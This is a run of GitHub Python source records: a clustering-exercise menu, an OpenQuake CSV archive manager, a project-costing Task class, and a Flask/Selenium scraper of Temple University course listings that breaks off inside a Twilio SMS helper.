print(\"2. Agglomerative Clustering.\")\n print(\"3. DBScan.\")\n print(\"*Exercise 2*\")\n print(\"4. Knn\")\n print(\"*Exercise 3*\")\n print(\"5. Decision Tree Classifier.\")\n selection = int(input(\"Enter your choice: \"))\n if selection == 1:\n k_means_clustering()\n print(\"Output saved in the Kmeans folder.\")\n elif selection == 2:\n agglomerative_clustering()\n print(\"Output saved in the Agglomerative Clustering folder.\")\n elif selection == 3:\n DBScan()\n print(\"Output saved in the DBScan folder.\")\n elif selection == 4:\n knn()\n elif selection == 5:\n decisicion_tree()\n\n else:\n menu = False\n\n\n\n'''\n accuracy = accuracy_score(y2, y_pred)\n print(\"Accuracy: \"+str(accuracy))\n the_average = \"micro\"\n precision = precision_score(y2, y_pred, average=the_average)\n print(\"Precision: \"+str(precision))\n recall = recall_score(y2, y_pred, average=the_average)\n print(\"Recall: \"+str(recall))\n f_score = f1_score(y2, y_pred, average=the_average)\n print(\"F1-Score: \"+str(f_score))\n'''","repo_name":"Kenneth11741149/Tarea-2_SistemasInteligentes","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"6360761406","text":"import os\nimport csv\nimport inspect\nimport zipfile\nimport StringIO\nimport tempfile\nfrom abc import ABCMeta, abstractmethod\n\nfrom openquake.nrmllib import InvalidFile\nfrom openquake.nrmllib.node import node_to_nrml, node_from_nrml\nfrom openquake.commonlib.record import Table\nfrom openquake.commonlib import record, records, converter\n\n\nclass FileWrapper(object):\n \"\"\"\n Mixin class providing a file-like interface to the underlying\n .fileobj.\n \"\"\"\n def __iter__(self):\n return self\n\n def next(self):\n return self.fileobj.next()\n\n def readline(self):\n return self.fileobj.readline()\n\n def read(self, n=-1):\n return self.fileobj.read(n)\n\n def write(self, data):\n self.fileobj.write(data)\n\n def flush(self):\n self.fileobj.flush()\n\n def close(self):\n self.fileobj.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, etype, exc, tb):\n self.close()\n\n\nclass FileObject(FileWrapper):\n \"\"\"\n A named reusable StringIO for reading and writing, useful for the tests\n \"\"\"\n def __init__(self, name, bytestring):\n self.name = name\n self.bytestring = bytestring\n self.fileobj = StringIO.StringIO(bytestring)\n\n def close(self):\n data = self.fileobj.getvalue()\n self.fileobj.close()\n self.fileobj = StringIO.StringIO(data)\n\n\nclass NotInArchive(Exception):\n \"\"\"Raised when trying to open a non-existing file in the archive\"\"\"\n\n\nclass Archive(object):\n \"\"\"\n Abstract Base Class for Archive classes. 
Subclasses must override\n the methods ``_open`` and ``extract_filenames``.\n \"\"\"\n __metaclass__ = ABCMeta\n\n opened = []\n\n def open(self, name, mode='r'):\n f = self._open(name, mode)\n self.opened.add(f)\n return f\n\n @abstractmethod\n def _open(self, name, mode):\n pass\n\n @abstractmethod\n def extract_filenames(self, prefix=''):\n pass\n\n def close(self):\n for f in self.opened:\n f.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, etype, exc, tb):\n self.close()\n\n def __repr__(self):\n return '<%s %s>' % (self.__class__.__name__, self.extract_filenames())\n\n def __contains__(self, name):\n \"\"\"Check if a name is contained in the archive\"\"\"\n try:\n self.open(name, 'r').close()\n except:\n return False\n else:\n return True\n\n\n# Writing directly to a zip archive is not possible because .writestr\n# adds a new object every time it is called, so you cannot work line-by-line.\n# The solution is to write to a temporary file and then push it into the\n# archive at closing time\nclass TempFile(FileWrapper):\n \"\"\"\n Wrapper over a NamedTemporaryFile to be used in conjunction with\n ZipArchive objects. It automatically stores the data in the archive\n at file closing time.\n \"\"\"\n def __init__(self, arczip, arcname, mode):\n self.arczip = arczip\n self.name = arcname\n self.fileobj = tempfile.NamedTemporaryFile(mode)\n self.tempname = self.fileobj.name\n self.closed = False\n\n def close(self):\n if self.closed: # already closed, do nothing\n return\n self.fileobj.seek(0) # this is essential\n self.arczip.write(self.tempname, self.name) # save in the archive\n self.fileobj.close() # remove the temporary file\n self.closed = True\n\n\nclass ZipArchive(Archive):\n \"\"\"\n Thin wrapper over a ZipFile object.\n \"\"\"\n def __init__(self, zipname, mode='a'):\n self.zip = zipfile.ZipFile(zipname, mode)\n self.name = self.zip.filename\n self.opened = set()\n\n def _open(self, name, mode):\n if mode in ('w', 'w+', 'r+'):\n # write on a temporary file\n return TempFile(self.zip, name, mode)\n else:\n # open for reading\n return self.zip.open(name, mode)\n\n def extract_filenames(self, prefix=''):\n \"\"\"\n Return the file objects in the archive with the given prefix\n \"\"\"\n return set(i.filename for i in self.zip.infolist()\n if i.filename.startswith(prefix))\n\n\nclass DirArchive(Archive):\n \"\"\"\n Provides an archive interface over a filesystem directory\n \"\"\"\n def __init__(self, dirname, mode='r'):\n self.name = dirname\n self.mode = mode\n if mode in ('w', 'w+', 'r+') and not os.path.exists(dirname):\n os.mkdir(dirname)\n else:\n assert os.path.exists(dirname), dirname\n self.opened = set()\n\n def _open(self, name, mode):\n return open(os.path.join(self.name, name), mode)\n\n def extract_filenames(self, prefix=''):\n \"\"\"\n Return the file objects in the archive with the given prefix\n \"\"\"\n return [f for f in os.listdir(self.name) if f.startswith(prefix)]\n\n\nclass MemArchive(Archive):\n \"\"\"\n Provides an archive interface over FileObjects in memory\n \"\"\"\n def __init__(self, items, mode='r'):\n self.dic = {}\n for name, csvstr in items:\n self.add(name, csvstr)\n self.opened = set()\n\n def add(self, name, csvstr):\n self.dic[name] = FileObject(name, csvstr)\n\n def _open(self, name, mode='r'):\n if mode in ('w', 'w+', 'r+'):\n self.dic[name] = f = FileObject(name, '')\n return f\n try:\n return self.dic[name]\n except KeyError:\n raise NotInArchive(name)\n\n def extract_filenames(self, prefix=''):\n \"\"\"\n Return the file 
objects in the archive with the given prefix\n \"\"\"\n return [f for f in self.dic if f.startswith(prefix)]\n\n\ndef mkarchive(pathname, mode):\n \"\"\"\n Return a ZipArchive or a DirArchive depending on the pathname extension\n \"\"\"\n if pathname.endswith('.zip'):\n return ZipArchive(pathname, mode)\n else:\n return DirArchive(pathname, mode)\n\n\n# used in the tests\ndef create_table(recordtype, csvstr):\n \"\"\"\n Given a record class and a csv UTF8-encoded string, returns\n a Table object.\n \"\"\"\n name = '__' + recordtype.__name__ + '.csv'\n archive = MemArchive([(name, csvstr)])\n man = CSVManager(archive, has_header=False)\n reclist = list(man.read(recordtype))\n return Table(recordtype, reclist)\n\n\nclass MultipleManagerError(Exception):\n \"\"\"\n Raised when it is not possible to extract a single manager\n from an archive of CSV files (i.e. there is more than one common\n prefix).\n \"\"\"\n\n\nclass CSVManager(object):\n \"\"\"\n A class to manage CSV files stored in an Archive object.\n The file names must be of the form <prefix>__<RecordType>.csv\n where <RecordType> is the name of the record class describing\n the structure of the file. For instance an archive could contain\n the files\n\n vulnerability-model-discrete__DiscreteVulnerability.csv\n vulnerability-model-discrete__DiscreteVulnerabilityData.csv\n vulnerability-model-discrete__DiscreteVulnerabilitySet.csv\n\n then the method .convert_to_node() would convert the files\n into a Node object by using the appropriate converter and\n the method .convert_to_nrml() would generate an XML file\n named vulnerability-model-discrete.xml in the archive.\n Vice versa, starting from an empty archive and a file named\n vulnerability-model-discrete.xml, it is possible to generate\n the CSV files by calling\n\n CSVManager(archive).convert_from_nrml(fname)\n \"\"\"\n convertertype = converter.Converter\n\n def __init__(self, archive, prefix='', has_header=True):\n self.archive = archive\n self.prefix = prefix\n self.has_header = has_header\n self.rt2reader = {}\n self.rt2writer = {}\n self.rt2file = {}\n\n def _getmanagers(self):\n \"\"\"\n Returns a list of managers, one for each file group in the\n underlying archive. Each manager has its own converter class.\n \"\"\"\n managers = {} # name->manager dictionary\n ct = {} # converter name -> converter type dictionary\n for name, value in vars(converter).iteritems():\n if inspect.isclass(value) and issubclass(\n value, converter.Converter):\n ct[name] = value\n for fname in sorted(self.archive.extract_filenames()):\n try:\n prefix, recordcsv = fname.split('__')\n except ValueError:\n continue\n if not recordcsv.endswith('.csv'):\n continue\n recordtype = getattr(records, recordcsv[:-4], None)\n if recordtype is None:\n continue\n if prefix not in managers:\n man = self.__class__(self.archive, prefix)\n man.convertertype = ct[recordtype.convertername]\n managers[prefix] = man\n return managers.values()\n\n def _getconverter(self):\n \"\"\"\n Extract the appropriate converter class to convert the files in\n the underlying archive. Raise an error if no converter is\n found (this happens if there are no files following the\n naming conventions).\n \"\"\"\n managers = self._getmanagers()\n if not managers:\n raise NotInArchive(\n 'Could not determine the right manager '\n 'for files %s' % self.archive.extract_filenames())\n elif len(managers) > 1:\n raise MultipleManagerError(\n 'Found %d managers %s, expected 1' %\n (len(managers), managers))\n return managers[0].convertertype\n\n def get_tableset(self):\n \"\"\"\n Return a populated TableSet from the underlying CSV files\n \"\"\"\n tset = record.TableSet(self._getconverter())\n for rectype in tset.convertertype.recordtypes():\n try:\n tset.insert_all(self.read(rectype))\n except NotInArchive:\n # this may happen for optional tables in the tableset\n continue\n return tset\n\n def convert_to_node(self):\n \"\"\"\n Convert the CSV files in the archive with the given prefix\n into a Node object. Raise an error if some files are missing.\n \"\"\"\n return self.get_tableset().to_node()\n\n def convert_to_nrml(self, out_archive=None):\n \"\"\"\n From CSV files with the given prefix to .xml files; if the output\n directory is not specified, use the input archive to store the output.\n \"\"\"\n fnames = []\n for man in self._getmanagers():\n with man:\n outname = man.prefix + '.xml'\n if out_archive is None:\n out = man.archive.open(outname, 'w+')\n else:\n out = out_archive.open(outname, 'w+')\n with out:\n node = man.get_tableset().to_node()\n node_to_nrml(node, out)\n fnames.append(out.name)\n return fnames\n\n def convert_from_nrml(self, fname):\n \"\"\"\n Populate the underlying archive with CSV files extracted from the\n given XML file.\n \"\"\"\n assert fname.endswith('.xml'), fname\n prefix = os.path.basename(fname)[:-4]\n return self.convert_from_node(node_from_nrml(fname)[0], prefix)\n\n def convert_from_node(self, node, prefix=None):\n \"\"\"\n Populate the underlying archive with CSV files extracted from the\n given Node object. If the prefix is not None, instantiate a new\n manager object associated to the same archive and return it.\n \"\"\"\n if prefix is None:\n man = self\n else: # creates a new CSVManager for the given prefix\n man = self.__class__(self.archive, prefix)\n convtype = converter.Converter.from_node(node)\n with man:\n for rec in convtype.node_to_records(node):\n man.write(rec) # automatically opens the needed files\n return man\n\n 
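# Editor's sketch (not part of the original module; file names are hypothetical):\n # man = CSVManager(DirArchive('csvdir', 'r+'))\n # man.convert_from_nrml('csvdir/vulnerability-model-discrete.xml') # XML -> CSV files\n # man.convert_to_nrml() # CSV files -> XML, written back into the archive\n\n def read(self, recordtype):\n \"\"\"\n Read the records from the underlying CSV file. 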
Returns an iterator.\n \"\"\"\n reader = self.rt2reader.get(recordtype)\n if reader is None:\n fname = '%s__%s.csv' % (self.prefix, recordtype.__name__)\n self.rt2file[recordtype] = f = self.archive.open(fname, 'r')\n self.rt2reader[recordtype] = reader = csv.reader(f)\n if self.has_header:\n header = reader.next()\n if header != recordtype.fieldnames:\n raise InvalidFile(\n '%s: line 1: got %s as header, expected %s' %\n (fname, header, recordtype.fieldnames))\n for row in reader:\n yield recordtype(*row)\n\n def readtable(self, recordtype):\n \"\"\"\n Generate a Table object from the underlying CSV\n \"\"\"\n return Table(recordtype, list(self.read(recordtype)))\n\n def find_invalid(self, limit=None):\n \"\"\"\n Yield the InvalidRecord exceptions found in the CSV files.\n If limit=1, the search stops at the first exception found.\n\n :param limit:\n\n the maximum number of exceptions to retrieve;\n if None, all the exceptions are retrieved.\n \"\"\"\n it = self._find_invalid()\n if limit is None:\n return list(it) # return all\n return [e for i, e in zip(range(limit), it)]\n\n def _find_invalid(self):\n for man in self._getmanagers():\n for recordtype in man.convertertype.recordtypes():\n fname = '%s__%s.csv' % (man.prefix, recordtype.__name__)\n if fname in self.archive:\n recorditer = man.read(recordtype)\n for invalid in record.find_invalid(recorditer):\n invalid.fname = fname\n yield invalid\n\n def write(self, record):\n \"\"\"\n Write a record on the corresponding CSV file\n \"\"\"\n rt = type(record) # record type\n writer = self.rt2writer.get(rt)\n if writer is None:\n fname = '%s__%s.csv' % (self.prefix, rt.__name__)\n self.rt2file[rt] = f = self.archive.open(fname, 'w')\n self.rt2writer[rt] = writer = csv.writer(f)\n if self.has_header:\n writer.writerow(rt.fieldnames)\n writer.writerow(record)\n\n def __enter__(self):\n \"\"\"Initialize a few dictionaries\"\"\"\n self.rt2reader = {}\n self.rt2writer = {}\n self.rt2file = {}\n self.archive.opened = set()\n return self\n\n def __exit__(self, etype, exc, tb):\n \"\"\"Close the underlying archive\"\"\"\n self.archive.close()\n\n def __str__(self):\n \"\"\"Display the filenames managed by the CSVManager\"\"\"\n return '<%s %s>' % (\n self.__class__.__name__,\n self.archive.extract_filenames(self.prefix))\n","repo_name":"larsbutler/oq-commons","sub_path":"openquake/commonlib/csvmanager.py","file_name":"csvmanager.py","file_ext":"py","file_size_in_byte":14959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6360761406","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nClass Task:\n===========\n\n Creates an instance of the Task class and provides access methods\n to complete the attributes.\n\n\n Class attributes:\n -----------------\n __Debug : Boolean: set for debug print out\n instances: List of instances if the Task class.\n\n \n Instance attributes:\n --------------------\n _Name = Name of task\n _WorkPackage = Instance of WorkPackage task in which this task \n is defined\n _StaffCostByYear = Total cost of staff in £k for this task by FY\n _CGStaffCostByYear = Cost of CG staff in £k for this task by FY\n _TotalStaffCost = Summed total staff cost over duration of project\n (£k)\n _TotalStaffFrac = Summed total FTE over duration of project (£k)\n _TotalCGStaffCost = Summed total CG staff cost over duration of project \n (£k)\n _EquipmentCostByYear = Total cost of equipment in £k for this task by FY\n _TotalEquipCost = Summed total equipment cost over 
duration of\n project (£k)\n \n Methods:\n --------\n Built-in methods __new__, __repr__ and __str__.\n __init__: Creates instance and prints some parameters if __Debug is \n True.\n __repr__: One liner with call.\n __str__ : Dump of constants.\n\n\n I/o methods:\n createCSV : Creates CSV file containing Task parameters.\n [Classmethod]\n Input: Instance of Pandas dataframe class containing \n parameters\n String -- path to output file (filename)\n\n\n Get/set methods:\n getInstance: Finds instance of class with Task._Name\n Input: _Name -- str -- name of Task to be found\n Return: Instance of class; None if not found or if more than\n one instance\n [Classmethod]\n\n setStaffCostByYear: Set staff cost per year (£k)\n Input: numpy array\n \n setStaffFracByYear: Set staff fraction per year (FTE)\n Input: numpy array\n \n setCGStaffCostByYear: Set CG staff cost per year (£k)\n Input: numpy array\n\n setTotalStaffCost: Set total staff cost (£k)\n Sums staff cost per year.\n \n setTotalStaffFrac: Set total staff frac\n Sums staff FTE per year.\n \n setTotalCGStaffCost: Set total CG staff cost (£k)\n Sums CG staff cost per year.\n \n setEquipmentCostByYear: Set equipment cost per year (£k)\n Input: numpy array\n\n setTotalEquipmentCost: Set total equipment cost (£k)\n Sums equipment cost per year.\n\n\n Processing methods:\n createPandasDataframe : Create Pandas data frame containing Task\n parameters.\n [Classmethod]\n Input: None.\n Return: Instance of Pandas class.\n\n clean: Delete incomplete instances of Task\n [classmethod]\n\n doCosting: Complete costing of Task. Sums data from TaskStaff and\n TaskEquipment related to Task and completes Task costing.\n [Classmethod]\n\n \nCreated on Wed 19Jun21. Version history:\n----------------------------------------\n 1.0: 19Jun21: First implementation\n\n@author: kennethlong\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom operator import attrgetter\n\nimport WorkPackage as wp\nimport TaskStaff as TskStf\nimport TaskEquipment as TskEqp\nimport Progress as Prg\n\nclass Task:\n __Debug = False\n instances = []\n\n#-------- \"Built-in methods\":\n def __init__(self, _Name=\"None\", _WPInst=None):\n\n self._Name = _Name\n self._WorkPackage = _WPInst\n\n 
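# Editor's comment: the attributes below are populated later by doCosting();\n # they stay None until the costing pass has run.\n #.. 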
Defined, but not filled, at init:\n self._StaffFracByYear = None\n self._StaffCostByYear = None\n self._CGStaffCostByYear = None\n self._TotalStaffCost = None\n self._TotalStaffFrac = None\n self._TotalCGStaffCost = None\n self._EquipmentCostByYear = None\n self._TotalEquipmentCost = None\n \n Task.instances.append(self)\n \n def __repr__(self):\n return \"Task(Name)\"\n\n def __str__(self):\n print(\" Task:\", self._Name)\n print(\" ----> WorkPackage:\", self._WorkPackage._Name, \" \\n\")\n print(\" Staff frac by year:\", self._StaffFracByYear)\n print(\" Staff cost by year:\", self._StaffCostByYear)\n print(\" CG staff cost by year:\", self._CGStaffCostByYear)\n print(\" Total staff frac:\", self._TotalStaffFrac)\n print(\" Total staff cost:\", self._TotalStaffCost)\n print(\" Total CG staff cost:\", self._TotalCGStaffCost)\n print(\" Equipment cost by year:\", self._EquipmentCostByYear)\n print(\" Total equipment cost:\", self._TotalEquipmentCost)\n return \" <---- Task complete.\"\n\n \n#-------- I/o methods:\n @classmethod\n def createCSV(cls, _TskDataFrame, _filename):\n _TskDataFrame.to_csv(_filename)\n\n\n#-------- Get/set methods:\n def getName(self):\n return self._Name\n \n @classmethod\n def getInstance(cls, _Name, _WPInst):\n InstList = []\n if Task.__Debug:\n print(\" Task; getInstance: search for Task name, WP name:\", \\\n _Name, _WPInst._Name)\n for inst in cls.instances:\n if Task.__Debug:\n print(\" Task; getInstance: instances:\", \\\n inst._Name, inst._WorkPackage._Name)\n if inst._Name == _Name and \\\n inst._WorkPackage._Name == _WPInst._Name:\n InstList.append(inst)\n Ninst = len(InstList)\n if Ninst == 0:\n RtnInst = None\n if Ninst == 1:\n RtnInst = InstList[0]\n if Ninst >= 2:\n RtnInst = None\n raise DuplicateTaskClassInstance(Ninst, \"instances of \", _Name)\n\n if Task.__Debug:\n print(\" Task; getInstance: number of instances; return instance:\", \\\n Ninst, \"\\n \", RtnInst)\n\n return RtnInst\n\n def getTotalValue(self):\n TV = None\n if self._TotalStaffCost != None and \\\n self._TotalEquipmentCost != None:\n TV = self._TotalStaffCost + self._TotalEquipmentCost\n return TV\n\n def setStaffCostByYear(self, _StaffCostByYear):\n self._StaffCostByYear = _StaffCostByYear\n \n def setStaffFracByYear(self, _StaffFracByYear):\n self._StaffFracByYear = _StaffFracByYear\n \n def setCGStaffCostByYear(self, _CGStaffCostByYear):\n self._CGStaffCostByYear = _CGStaffCostByYear\n\n def setTotalStaffCost(self):\n self._TotalStaffCost = np.sum(self._StaffCostByYear)\n \n def setTotalStaffFrac(self):\n self._TotalStaffFrac = np.sum(self._StaffFracByYear)\n \n def setTotalCGStaffCost(self):\n self._TotalCGStaffCost = np.sum(self._CGStaffCostByYear)\n \n def setEquipmentCostByYear(self, _EquipmentCostByYear):\n self._EquipmentCostByYear = _EquipmentCostByYear\n\n def setTotalEquipmentCost(self):\n self._TotalEquipmentCost = np.sum(self._EquipmentCostByYear)\n \n\n#-------- Processing methods:\n @classmethod\n def createPandasDataframe(cls):\n TaskData = []\n TaskData.append([\"Name\", \\\n \"WorkPackage\", \\\n \"Staff cost by year (£k)\", \\\n \"Total staff cost (£k)\", \\\n \"CG staff cost per year (£k)\", \\\n \"Total CG staff cost (£k)\", \\\n \"Equipment cost by year (£k)\", \\\n \"Total equipment cost (£k)\"])\n for inst in Task.instances:\n TaskData.append([inst._Name, \\\n inst._WorkPackage._Name, \\\n inst._StaffFracByYear, inst._TotalStaffFrac, \\\n inst._StaffCostByYear, inst._TotalStaffCost, \\\n inst._CGStaffCostByYear, inst._TotalCGStaffCost, \\\n 
inst._EquipmentCostByYear, \\\n inst._TotalEquipmentCost])\n TaskDataframe = pd.DataFrame(TaskData)\n if cls.__Debug:\n print(\" Task; createPandasDataframe: \\n\", TaskDataframe)\n return TaskDataframe\n \n @classmethod\n def clean(cls):\n OldInst = cls.instances\n NewInst = []\n nDel = 0\n for iTsk in OldInst:\n if not isinstance(iTsk._Name, str) or \\\n not isinstance(iTsk._WorkPackage, wp.WorkPackage):\n del iTsk\n nDel += 1\n else:\n NewInst.append(iTsk)\n cls.instances = NewInst\n return nDel\n\n @classmethod\n def clear(cls):\n OldInst = cls.instances\n NewInst = []\n nDel = 0\n for iTsk in OldInst:\n del iTsk\n nDel += 1\n cls.instances = NewInst\n return nDel\n\n @classmethod\n def doCosting(cls):\n for iTsk in cls.instances:\n _StaffFracByYear = np.array([])\n _StaffCostByYear = np.array([])\n _CGStaffCostByYear = np.array([])\n SumInitialised = False\n for iTskStf in TskStf.TaskStaff.instances:\n if iTskStf._Task == iTsk:\n for iYr in range(len(iTskStf._StaffCostByYear)):\n if not SumInitialised:\n _StaffFracByYear = \\\n np.append(_StaffFracByYear, [0.])\n _StaffCostByYear = \\\n np.append(_StaffCostByYear, [0.])\n _CGStaffCostByYear = \\\n np.append(_CGStaffCostByYear, [0.])\n SumInitialised = True\n _StaffFracByYear += iTskStf._StaffFracByYear\n _StaffCostByYear += iTskStf._StaffCostByYear\n if iTskStf._Staff._ProjectOrCG == \"CG\":\n _CGStaffCostByYear += iTskStf._StaffCostByYear\n iTsk._StaffFracByYear = _StaffFracByYear\n iTsk._StaffCostByYear = _StaffCostByYear\n iTsk.setTotalStaffFrac()\n iTsk.setTotalStaffCost()\n iTsk._CGStaffCostByYear = _CGStaffCostByYear\n\n for iTsk in cls.instances:\n _EquipmentCostByYear = np.array([])\n SumInitialised = False\n for iTskEqp in TskEqp.TaskEquipment.instances:\n if iTskEqp._Task == iTsk:\n iEqp = iTskEqp._Equipment\n for iYr in range(len(iEqp._EquipmentCostByYear)):\n if not SumInitialised:\n _EquipmentCostByYear = \\\n np.append(_EquipmentCostByYear, [0.])\n SumInitialised = True\n _EquipmentCostByYear += iEqp._EquipmentCostByYear\n iTsk.setEquipmentCostByYear(_EquipmentCostByYear)\n iTsk.setTotalEquipmentCost()\n\n\n#-------- Exceptions:\nclass DuplicateTaskClassInstance(Exception):\n pass\n","repo_name":"longkr/LhARA-costing-tool","sub_path":"01-Code/Task.py","file_name":"Task.py","file_ext":"py","file_size_in_byte":11253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6587813617","text":"from flask import Flask, redirect, url_for, render_template, request\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.chrome.options import Options\nfrom twilio.rest import Client\nimport time\nimport requests\nimport lxml.html as lh\napp = Flask(__name__)\n\n\"\"\"\nUsed the following as a guide:\nhttps://www.techwithtim.net/tutorials/flask/http-methods-get-post/\n\"\"\"\n\n\"\"\"\nCreated By: \n Felix Rabinovich, \n Ethan Lewis, \n Abin Cheryian, \n Erik Adrian Rodriguez,\n Dylan Dunda,\n Ryan Joseph Babala\n\"\"\"\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n\n@app.route(\"/course_select\", methods=[\"POST\", \"GET\"])\ndef course_select():\n all_courses = {\"course1\": {}, \"course2\": {}, \"course3\": {}, \"course4\": {}}\n if request.method == \"POST\":\n dept = 
request.form[\"fdept\"]\n crs1 = request.form[\"fcrs1\"]\n crs2 = request.form[\"fcrs2\"]\n crs3 = request.form[\"fcrs3\"]\n crs4 = request.form[\"fcrs4\"]\n\n courses = crs1+','+crs2+','+crs3+','+crs4\n\n return redirect(\n url_for(\"get_course\", department=dept, courses_input=courses))\n else:\n return render_template(\"index.html\")\n\n\n@app.route(\"/&\")\ndef get_course(department, courses_input):\n course_list = courses_input.split(',')\n print(\"course list = \", course_list)\n all_sections = {}\n print(\"all sections = \", all_sections)\n all_courses = {}\n crn = 0\n for idx, course_number in enumerate(course_list):\n course_results = {\"credits\": \"0\", \"sections\": {}}\n print()\n print()\n print(\"Course number = \", course_number)\n if course_number is None or course_number.isdigit() != True:\n print(\"No course given\")\n else:\n user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36\"\n PATH = \"/usr/local/bin/chromedriver\"\n #PATH = \"C:\\Program Files (x86)\\chromedriver.exe\"\n\n chrome_options = Options()\n chrome_options.headless = True\n chrome_options.add_argument(f'user-agent={user_agent}')\n chrome_options.add_argument(\"--window-size=1920,1080\")\n chrome_options.add_argument('--ignore-certificate-errors')\n chrome_options.add_argument('--allow-running-insecure-content')\n chrome_options.add_argument(\"--disable-extensions\")\n chrome_options.add_argument(\"--proxy-server='direct://'\")\n chrome_options.add_argument(\"--proxy-bypass-list=*\")\n chrome_options.add_argument(\"--start-maximized\")\n chrome_options.add_argument('--disable-gpu')\n chrome_options.add_argument('--disable-dev-shm-usage')\n chrome_options.add_argument('--no-sandbox')\n\n driver = webdriver.Chrome(PATH, options = chrome_options)\n #driver = webdriver.Chrome(PATH)\n\n\n # page = requests.get(\"https://prd-xereg.temple.edu/StudentRegistrationSsb/ssb/term/termSelection?mode=courseSearch\")\n driver.get(\"https://prd-xereg.temple.edu/StudentRegistrationSsb/ssb/term/termSelection?mode=courseSearch\")\n # driver.get(\"https://prd-xereg.temple.edu/StudentRegistrationSsb/ssb/courseSearch/courseSearch\")\n time.sleep(3)\n sel = driver.find_element_by_id('s2id_txt_term')\n sel.click()\n\n # sel.select_by_visible_text(\"Spring 2022\")\n time.sleep(2)\n\n select = driver.find_element_by_id(\"s2id_autogen1_search\")\n select.send_keys('2022 Spring')\n time.sleep(1)\n select.click()\n # select.select_by_value('2022 Spring')\n\n time.sleep(1)\n spring = driver.find_element_by_id(\"select2-results-1\")\n spring.click()\n # spring.select_by_visible_text('2022 Spring')\n\n submit = driver.find_element_by_id('term-go')\n submit.click()\n\n time.sleep(1)\n\n subject_before = driver.find_element_by_id(\"s2id_txt_subject\")\n subject_before.click()\n\n subject_after = driver.find_element_by_id(\"s2id_autogen1\")\n subject_after.send_keys(department)\n time.sleep(1)\n subject_after.send_keys(Keys.RETURN)\n\n crnum_from = driver.find_element_by_name(\"txt_course_number_range_From\")\n crnum_from.click()\n crnum_from.send_keys(course_number)\n\n crnum_to = driver.find_element_by_name(\"txt_course_number_range_To\")\n crnum_to.send_keys(course_number)\n\n search = driver.find_element_by_id(\"search-go\")\n search.click()\n\n time.sleep(1)\n view_sections = driver.find_element_by_class_name(\"form-button.search-section-button\")\n view_sections.click()\n\n time.sleep(2)\n table = driver.find_element(By.ID, \"table1\")\n table_body = 
table.find_element(By.TAG_NAME, \"tbody\")\n rows = table_body.find_elements(By.TAG_NAME, \"tr\")\n\n section_results = {}\n\n # \"//tagname[@Atrribute='Value']\"\n for row in rows: #sections of a course\n print(\"-------\")\n course_results[\"credits\"] = row.find_element(By.XPATH, \"//td[@data-property='creditHours']\").text\n\n #crn = row.find_element(By.XPATH, \"//td[@data-property='courseReferenceNumber']\").get_attribute('innerHTML')\n #print(\"crn = \", crn)\n crn += 1\n meeting_times = []\n\n prof_td = row.find_element(By.XPATH, \"//td[@data-property='instructor']\")\n prof = prof_td.find_element(By.CLASS_NAME, \"email\").get_attribute('innerHTML') # Professor's name\n print(\"Prof = \", prof)\n\n meeting_td = row.find_element(By.XPATH, \"//td[@data-property='meetingTime']\")\n meetings = row.find_elements(By.CLASS_NAME, \"meeting\")\n for meeting in meetings:\n dayParent = meeting.find_element(By.CLASS_NAME, \"ui-pillbox\")\n day = dayParent.find_element(By.CLASS_NAME, \"ui-pillbox-summary\").get_attribute('innerHTML')\n #day = meeting.find_element(By.XPATH, \"//*[contains(@title,'Class on')]//descendant::div[1]\").get_attribute('innerHTML')\n #day = dayPrelim.find_element(By.XPATH, \"//div[@class='ui-pillbox-summary screen-reader']\").text\n print(\"Day = \", day)\n\n time_range = meeting.find_element(By.TAG_NAME, \"span\") # time range is nested spans\n i = 0\n start, end = \"\", \"\"\n print(time_range.text)\n for span in time_range.find_elements(By.TAG_NAME, \"span\"): #loops 4 times\n #print(\"current span = \", span.get_attribute('innerHTML'))\n #print(\"i = \", i)\n if i == 0:\n start += span.text\n start += \":\"\n i += 1\n continue\n\n if i == 1:\n start += span.text\n i += 1\n continue\n\n if i == 2:\n end += span.text\n end += \":\"\n i += 1\n continue\n\n if i == 3:\n end += span.get_attribute('innerHTML')\n i += 1\n continue\n\n if ',' in day: # Multiple days per 1 meeting time of day\n days_split = day.split(\",\")\n for meeting_day in days_split:\n meeting_map = {\"day\": meeting_day, \"start\": start, \"end\": end, \"instructor\": prof}\n meeting_times.append(meeting_map)\n else:\n meeting_map = {\"day\": day, \"start\": start, \"end\": end, \"instructor\": prof}\n meeting_times.append(meeting_map)\n\n section_results[crn] = meeting_times\n print(\"section results = \", section_results)\n course_results[\"sections\"] = section_results\n driver.quit()\n all_courses[course_number] = course_results\n print(\"** All courses: \", all_courses)\n return render_template(\"output.html\", final_results = all_courses)\n\n\ndef twilio():\n TWILIO_SID = 'ACbf02fe253cef5d92aac22aa3bd5b1676'\n TWILIO_TOKEN = ''\n TWILIO_PHONE = '+12156087254'\n\n client = Client(TWILIO_SID, TWILIO_TOKEN)\n\n def sendOneMessage(sendTo):\n client.messages.create(body=\"Hey There ! 
